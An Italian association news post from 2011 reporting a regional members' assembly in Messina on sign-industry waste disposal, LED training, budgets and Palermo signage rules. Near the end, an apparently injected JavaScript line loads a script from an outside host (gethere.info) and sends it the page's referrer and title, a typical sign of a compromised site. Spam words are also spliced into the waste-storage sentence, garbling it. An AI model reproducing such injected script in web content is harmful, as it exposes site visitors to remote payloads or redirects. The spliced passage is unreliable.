AIFIL Area 7 – 26/03/2011: Assemblea Territoriale. Al centro dell’attenzione il problema della raccolta dei rifiuti da insegne.

di Redazione AIFIL[IN]FORMA - 14 aprile 2011
Classificato in: Mondo AIFIL, Segreterie territoriali, Vita AIFIL | Tag: ,

In data 26/03/2011 i Soci dell’area 7 (Sicilia e Calabria) si sono riuniti a Messina. Molti i punti all’ordine del giorno ad essere discussi.

L’attenzione dei Soci convenuti si è centrata su diverse problematiche.

  • Problema della raccolta dei rifiuti prodotti dai fabbricanti d’insegne.

Intento di Aifil: chiedere agli enti di individuare almeno una discarica per provincia, quindi in tutto nove discariche, e fare in modo che le aziende del settore insegne vi possano portare i rifiuti utilizzando mezzi propri, autorizzati ovviamente dalla Camera di Commercio di Palermo. Nell’eventualità di un’esplicita intenzione di pervenire alla costituzione di un’area di stoccaggio dei rifiuti match supreme prem speciali da parte della Commissione Ambiente Sicilia, Aifil è disponibile a collaborare con gli enti.

  • Il corso per  l’uso dei Led nelle insegne può essere tenuto anche in Sicilia, con una eventuale diminuzione della quota di partecipazione per i soci?
  • Proposte alla Presidenza Nazionale di soluzioni economiche per gestire le difficoltà di bilancio e per mantenere costante l’adesione dei Soci all’Associazione .
  • Invio al Comune di Palermo di una lettera al fine di ottenere di partecipare alla stesura del nuovo PGI e del Regolamento per le Insegne.

Per ulteriori approfondimenti:

  • Verbale Assemblea Territoriale del 26/03/11

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed